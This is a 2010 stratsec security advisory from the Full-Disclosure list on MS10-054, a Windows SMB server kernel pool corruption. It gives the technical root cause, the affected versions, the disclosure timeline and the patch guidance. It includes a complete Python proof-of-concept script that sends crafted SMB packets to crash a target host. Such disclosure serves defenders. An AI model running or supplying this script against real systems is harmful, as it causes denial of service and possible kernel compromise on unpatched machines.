=============================================================================== stratsec Security Advisory: SS-2010-007 MS SMB Server Zero Size Pool Allocation =============================================================================== Title: SS-2010-007 Microsoft SMB Server Zero Size Pool Allocation Version: 1.0 Issue type: Pool Corruption Affected vendor: Microsoft Release date: 11/08/2010 Discovered by: Laurent Gaffié Advisory by: Laurent Gaffié Issue status: Patch available =============================================================================== Summary ------- A vulnerability in the Windows kernel can be triggered via SMB in Microsoft Windows versions ranging from Windows 2000 through to Windows 7. This vulnerability allows an attacker to trigger a kernel pool corruption by sending a specially crafted SMB_COM_TRANSACTION2 request.Successful exploitation of this issue may result in remote code execution with kernel privileges, while failed attempts will result in a Denial of Service condition.Microsoft has published a patch to resolve the issue Technical details ----------------- The following analysis has been performed on an up-to-date Windows 7 x86-32 system.The issue is triggered by sending a crafted SMB_COM_TRANSACTION2 request: - The client connects to a SMB server with at least read privileges on this share. - The client constructs a malicious Trans2 "QUERY_FS_INFO Query FS Attribute info" with the Max DataCount parameter set to 0. During processing of the query, SrvSmbQueryFsInformation() from srv.sys will call NtQueryVolumeInformationFile(FileFsSizeInformation) from ntoskrnl.exe NtQueryVolumeInformationFile allocates a pool chunk with a size taken from an unverified user input: kd> nt!NtQueryVolumeInformationFile+0x3de: 82a5779c ff7514 push dword ptr [ebp+14h] ;User controlled 82a5779f 50 push eax 82a577a0 e85d1fe6ff call nt!ExAllocatePoolWithQuotaTag (828b9702) 82a577a5 eb23 jmp nt!NtQueryVolumeInformationFile+0x40c (82a577ca) kd> The actual code of the NtQueryVolumeInformationFile function looks like this: NTSTATUS NtQueryVolumeInformationFile(IN HANDLE FileHandle, OUT PIO_STATUS_BLOCK IoStatusBlock, OUT PVOID FileSystemInformation, IN ULONG Length, IN FS_INFORMATION_CLASS FileSystemInformationClass) { if (RequestorMode != KernelMode) { } if (FileSystemInformationClass == FileFsDeviceInformation) { } if (FileSystemInformationClass == FileFsDriverPathInformation) { PFILE_FS_DRIVER_PATH_INFORMATION Buffer, Source; Source = (PFILE_FS_DRIVER_PATH_INFORMATION)FileSystemInformation; Buffer = (PFILE_FS_DRIVER_PATH_INFORMATION)ExAllocatePoolWithQuota(NonPagedPool, Length); RtlCopyMemory(Buffer, Source, Length); NtStatus = IopGetDriverPathInformation(FileObject, Buffer, Length); // [...] if (Buffer) ExFreePool(Buffer); } // Issue; //SystemBuffer, which is the buffer used for the I/O, can be allocated with //a size of zero because of the lack of length sanity check. //Later this buffer is used for various operations, which is the source of //trouble when the I/O Manager tries to release the buffer. Irp->AssociatedIrp.SystemBuffer = ExAllocatePoolWithQuota(NonPagedPool, Length); // This buffer is freed later by the Windows I/O Manager. } Impact ------ Successful attempts may allow code execution with kernel privileges, failed attempts will result in a denial of service (B.S.O.D). Affected products ----------------- Windows: - 2000 - XP - 2003 - Vista - 2008 - 7 - 2008R2 Proof of concept ---------------- #!/usr/bin/env python import sys,struct,socket from socket import * if len(sys.argv)<=2: print '#######################################################################' print '# MS10-054 Proof Of Concept' print '# Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)' print '# Example: python '+sys.argv[0]+' 192.168.8.101 users' print '#######################################################################\n\n' sys.exit() host = str(sys.argv[1]),445 packetnego = "\x00\x00\x00\x9a" packetnego += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" packetnego += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00\x01\x3d" packetnego += "\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50" packetnego += "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4d\x49\x43\x52" packetnego += "\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x33" packetnego += "\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d\x31\x2e\x32\x58\x30\x30" packetnego += "\x32\x00\x02\x44\x4f\x53\x20\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31" packetnego += "\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f" packetnego += "\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4e" packetnego += "\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00" def tidpiduidfield(data): all_=data[28:34] return all_ def handle(data): ##Chained SMB commands; Session Setup AndX Request,Tree connect if data[8:10] == "\x72\x00": sharename = "\x00\x00\x5c\x5c\x5c"+str(sys.argv[2])+"\x00\x3f\x3f\x3f\x3f\x3f\x00" packetsession = "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00" packetsession += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd5\x15\x01\x00\x81\x2f" packetsession += "\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18" packetsession += "\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x01\x01\x01" packetsession += "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" packetsession += "\x01\x01\x01\x01\x01\x59\x4f\x00\x57\x4f\x52\x4b\x47\x52\x4f\x55" packetsession += "\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x57\x69" packetsession += "\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff\x00\x00\x00\x00" packetsession += "\x00\x01\x00"+struct.pack(">i", len(sharename))[3:4]+sharename print "[+]Session Query sent" return struct.pack(">i", len(packetsession))+packetsession ##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info if data[8:10] == "\x73\x00": packetrans = "\x00\x00\x00\x46" packetrans += "\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00" packetrans += "\x00\x00\x00\x00\x00\x00\x00\x00"+tidpiduidfield(data)+"\x13\x00" packetrans += "\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" packetrans += "\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05" packetrans += "\x00\x00\x44\x20\x05\x01" print "[+]Malformed Trans2 packet sent\n[+]The target should be down now" return packetrans def run(): s = socket(AF_INET, SOCK_STREAM) s.connect(host) s.settimeout(2) s.send(packetnego) print "[+]Negotiate Protocol Request sent" try: while True: data = s.recv(1024) s.send(handle(data)) except Exception: pass s.close() run() Solution -------- Apply appropriate security patches published by Microsoft in advisory MS10-054. Alternatively, configure a firewall to block SMB communications with untrusted clients. Response timeline ----------------- * 11/02/2010 - Vendor notified * 11/02/2010 - Vendor acknowledges the advisory * 16/02/2010 - MSRC confirms issue on Windows 7. * 26/02/2010 - MSRC provide a DC number and confirm the vulnerability across Windows 2000 to Windows 7. * 27/02/2010 - MSRC indicates vulnerability is to be categorised as post-auth on all platforms and ask for confirmation. stratsec responds with additional information. * 11/03/2010 - MSRC confirms issue as a remote unauthenticated code execution issue for pre-Windows Vista platforms and upgrades overall bulletin severity to Critical * 12/03/2010 - MSRC plan to release a patch in June 2010 * 30/04/2010 - MSRC push back the update to August 2010. stratsec agree on new release date. * 24/07/2010 - MSRC confirm the patch for August. * 05/08/2010 - MSRC propose to give a vendor statement or review this advisory * 05/08/2010 - stratsec request the CVE number and advisory link to MSRC, and provide this advisory for review. * 09/08/2010 - MSRC confirm the technical details of this advisory, and provide the CVE and link details. * 11/08/2010 - This advisory released. References ---------- * Vendor advisory: http://www.microsoft.com/technet/security/Bulletin/MS10-054.mspx * CVE item: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2550 =============================================================================== About stratsec -------------- Stratsec, specialises in providing information security consulting and testing services for government and commercial clients. Established in 2004, we are now one of the leading independent information security companies in the Australasian and SE-Asian region, with offices throughout Australia and in Singapore and Malaysia. For more information, please visit our website at http://www.stratsec.net/ =============================================================================== -- Message protected by MailGuard: e-mail anti-virus, anti-spam and content filtering.http://www.mailguard.com.au/mg _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/